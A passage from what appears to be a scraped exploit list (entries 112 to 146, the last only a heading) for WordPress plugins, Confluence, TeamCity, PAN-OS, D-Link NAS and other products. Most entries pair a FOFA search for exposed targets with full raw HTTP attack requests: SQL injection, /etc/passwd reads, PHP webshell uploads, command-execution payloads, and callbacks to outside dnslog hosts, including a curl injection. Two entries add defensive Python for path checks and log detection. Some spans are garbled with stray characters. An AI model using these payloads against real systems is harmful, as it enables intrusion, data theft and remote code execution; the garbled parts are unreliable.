Accept-Encoding: gzip


112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


Uploaded file path: /upload/2.php

121. Beijing Baichuo (北京百绰智能) S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

File path: boot/web/upload/weblogo/1.php

122. Beijing Baichuo (北京百绰智能) S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter is the SQL statement base64-encoded (encoded, not encrypted): sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The command output comes back in the X-Cmd-Response response header.

124. Hunan Jianyan (湖南建研) engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

File path: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; system commands can then be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

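As an added illustration of the bug class behind this entry (example code written for this page, not aiohttp's or ComfyUI's own implementation), the block below contrasts a naive static-file resolver, which joins the decoded request path onto the static root and lets the ".." segments walk out of it, with a hardened resolver that decodes, normalises and refuses anything that does not stay inside the root. The root directory /srv/app/static and the /static/ route prefix are assumed values; the request paths are taken from the entry above.

```python
import posixpath
from urllib.parse import unquote

STATIC_ROUTE = "/static/"  # assumed route prefix, matching the request above


def resolve_static_naive(root: str, url_path: str) -> str:
    """Vulnerable pattern (illustrative, not aiohttp's code): the decoded
    request path is joined onto the root and ".." is free to escape it."""
    rel = unquote(url_path)[len(STATIC_ROUTE):]
    return posixpath.normpath(posixpath.join(root, rel))


def resolve_static_safe(root: str, url_path: str):
    """Hardened resolver: returns the file path to serve, or None when the
    request must be rejected."""
    root = posixpath.normpath(root)
    decoded = unquote(url_path)          # handles %2e%2e and friends
    if not decoded.startswith(STATIC_ROUTE) or "\x00" in decoded:
        return None
    candidate = posixpath.normpath(
        posixpath.join(root, decoded[len(STATIC_ROUTE):]))
    # commonpath (rather than a string-prefix test) also rejects siblings
    # such as /srv/app/static-old that merely share the root as a prefix.
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    root = "/srv/app/static"
    for target in ("/static/css/app.css",
                   "/static/../../../../../etc/passwd",
                   "/static/%2e%2e/%2e%2e/etc/passwd"):
        print(target, "->", resolve_static_naive(root, target),
              "| safe:", resolve_static_safe(root, target))
```

The containment check above works on the URL string only; if the static tree can contain symlinks, resolve the candidate with os.path.realpath before the commonpath comparison, otherwise a link inside the root can still point outside it.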
127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 update 17 and earlier, 2021 update 7 and earlier, 2023 update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid request header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9


130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}


CVE-2024-27199 (path traversal variant in the same product):
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp


CVE-2024-27198-RCE.py
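For defenders reviewing TeamCity access logs, the two request shapes above are easy to pick out once the target URI is decoded and normalised: for CVE-2024-27198 the request URI ends in ".jsp" only because of the query string (the path itself does not), and a jsp= parameter names the internal endpoint the request is forwarded to; for CVE-2024-27199 the path starts under a resource prefix but normalises to somewhere else. The block below is an added example, not JetBrains' code or any published detection rule; the log lines are constructed, and the list of unauthenticated prefixes is an assumption taken from the three traversal paths listed above.

```python
import posixpath
import re
from urllib.parse import unquote

# Constructed sample lines in common log format; none come from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [04/Mar/2024:10:01:02 +0000] "POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1" 200 512
10.0.0.5 - - [04/Mar/2024:10:01:03 +0000] "GET /res/../admin/diagnostic.jsp HTTP/1.1" 200 8801
10.0.0.5 - - [04/Mar/2024:10:01:04 +0000] "GET /.well-known/acme-challenge/../../admin/diagnostic.jsp HTTP/1.1" 200 8801
10.0.0.9 - - [04/Mar/2024:10:02:00 +0000] "GET /login.html HTTP/1.1" 200 3302
10.0.0.9 - - [04/Mar/2024:10:02:01 +0000] "GET /res/img/logo.png HTTP/1.1" 200 1200
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
JSP_PARAM_RE = re.compile(r"(?:^|&)jsp=([^&]*)")
# Assumed: the prefixes the three traversal paths above start from.
UNAUTH_PREFIXES = ("/res/", "/.well-known/acme-challenge/", "/update/")


def classify(target: str):
    """Return (cve, detail) when the request target matches either pattern, else None."""
    decoded = unquote(target)
    path, _, query = decoded.partition("?")
    # CVE-2024-27198: ".jsp" suffix supplied by the query string, not the path,
    # plus a jsp= parameter pointing at the internal endpoint.
    if decoded.endswith(".jsp") and not path.endswith(".jsp"):
        m = JSP_PARAM_RE.search(query)
        forwarded = m.group(1).split(";", 1)[0] if m else path
        return "CVE-2024-27198", forwarded
    # CVE-2024-27199: starts under an unauthenticated prefix, normalises elsewhere.
    normalised = posixpath.normpath(path)
    for prefix in UNAUTH_PREFIXES:
        if path.startswith(prefix) and not (normalised + "/").startswith(prefix):
            return "CVE-2024-27199", normalised
    return None


def scan(log_text: str):
    """Return a list of (client_ip, cve, detail) for every suspicious request line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m is None:
            continue
        verdict = classify(m.group("target"))
        if verdict is not None:
            hits.append((line.split(" ", 1)[0], verdict[0], verdict[1]))
    return hits


if __name__ == "__main__":
    for ip, cve, detail in scan(SAMPLE_LOG):
        print(f"{ip}\t{cve}\t{detail}")
```

This is a first-pass filter on the two URI shapes shown in the entry. Tomcat also accepts ";"-delimited path parameters inside any segment, so a complete normaliser should strip those from every segment before the prefix comparison rather than only from the jsp= value.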
7 M) U( B' \) P
" A7 n6 z) _/ W' h- d133. H5 云商城 file.php 文件上传
4 o: x, h) j" g* z6 z2 r" w  TFOFA:body="/public/qbsp.php"! w9 G% g* Z" l% O4 s1 q. C4 v8 L
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
0 H4 x8 h+ x7 o6 ^# Y) x8 D5 fHost: your-ip
0 N9 |+ l3 @% xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
" ?; l& H) n) u$ iContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx: w9 ^4 e5 ?. ]1 I
+ S, {* @( d, K# S% [4 Z: Z
------WebKitFormBoundaryFQqYtrIWb8iBxUCx
, v0 `9 e* G3 s9 z( L; @Content-Disposition: form-data; name="file"; filename="rce.php"
; N; `2 J! y3 n$ f, A$ N! zContent-Type: application/octet-stream6 ~# I- f$ P* O6 {
& D& [# S8 `. P& y
<?php system("cat /etc/passwd");unlink(__FILE__);?>5 P1 `5 s$ B- T& B1 S
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--- h0 f# a/ A; b0 Q: R0 u; p/ p' `, }

8 D  Q9 z7 m+ T1 l3 @1 k
9 b$ @& \. B9 U  v: n# Z. ]4 C' B- t2 {3 |- Z6 Y5 X+ P
134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Kirisun (科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
Credentials: admin/admin
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to execute, base64-encoded (aWQ= decodes to id)
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}<dnslog-host>`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
